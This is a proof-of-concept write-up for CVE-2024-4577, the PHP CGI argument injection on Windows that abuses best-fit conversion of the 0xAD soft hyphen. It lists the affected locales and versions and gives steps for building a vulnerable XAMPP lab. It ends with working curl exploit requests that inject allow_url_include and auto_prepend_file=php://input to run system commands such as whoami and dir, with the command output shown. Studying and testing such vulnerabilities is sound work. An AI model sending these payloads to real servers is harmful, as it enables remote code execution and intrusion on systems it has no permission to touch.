CVE-2024-4577

CVE-2024-4577 is a PHP CGI argument injection vulnerability discovered by Orange Tsai of DEVCORE. When php-cgi runs on Windows, the operating system's "best-fit" character conversion turns the soft-hyphen byte 0xAD (%AD in a URL) into an ASCII hyphen under certain code pages, so a query string such as %ADd+allow_url_include%3d1 reaches php-cgi as the command-line option -d allow_url_include=1. This bypasses the protection added for CVE-2012-1823 and has been verified on Windows machines running in the following locales:

  • Traditional Chinese (Code Page 950)

  • Simplified Chinese (Code Page 936)

  • Japanese (Code Page 932)

All versions of XAMPP for Windows are vulnerable by default in the affected locales. The following PHP versions are affected on Windows (PHP 8.0, 7.x and 5.x are end-of-life, received no fix, and are vulnerable as well):

  • PHP 8.3 < 8.3.8

  • PHP 8.2 < 8.2.20

  • PHP 8.1 < 8.1.29


How to set up your own PoC environment

  1. On your Windows machine, download and install XAMPP.

  2. Download mod_fcgid.so and copy it to C:\xampp\apache\modules

  3. Verify that the following block in C:\xampp\apache\conf\extra\httpd-xampp.conf is not commented out. It routes every .php request to php-cgi.exe through the Action directive, which is what makes the query string reach php-cgi as command-line arguments:

#
# PHP-CGI setup
#
<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>
<IfModule actions_module>
    Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
</IfModule>
  4. Start Apache from the XAMPP Control Panel and verify that PHP is being served through CGI (for example, phpinfo() reports Server API: CGI/FastCGI).

  5. Change the system locale to one of the three locales listed above and reboot the host. This does not change the Windows display language: Control Panel > Clock and Region > Region > Administrative > Change system locale... Under a Western locale such as English (code page 1252) the 0xAD byte is the soft hyphen itself and is not converted to a hyphen, so this PoC will not fire.

  6. After the reboot, start Apache again and send the exploit request from any host that can reach it. The query string must not contain a literal "=" (hence %3d), or Apache will not pass it to php-cgi as command-line arguments at all; "+" separates the arguments, and each %ADd becomes a -d option that overrides an ini setting. The two settings below make PHP include the POST body as code before running index.php:

dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "whoami"'); ?>"
desktop-n7r8uh6\void

dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "dir"'); ?>"
 Volume in drive C has no label.
 Volume Serial Number is 0AE3-44EE

 Directory of C:\xampp\htdocs

2024-08-14  12:25    <DIR>          .
2024-08-14  10:45    <DIR>          ..
2022-06-15  18:07             3,607 applications.html
2022-06-15  18:07               177 bitnami.css
2024-08-14  10:18    <DIR>          dashboard
2015-07-16  17:32            30,894 favicon.ico
2024-08-14  10:18    <DIR>          img
2015-07-16  17:32               260 index.php
2024-08-14  10:17    <DIR>          webalizer
2024-08-14  10:18    <DIR>          xampp
               4 File(s)         34,938 bytes
               6 Dir(s)  28,033,204,224 bytes free
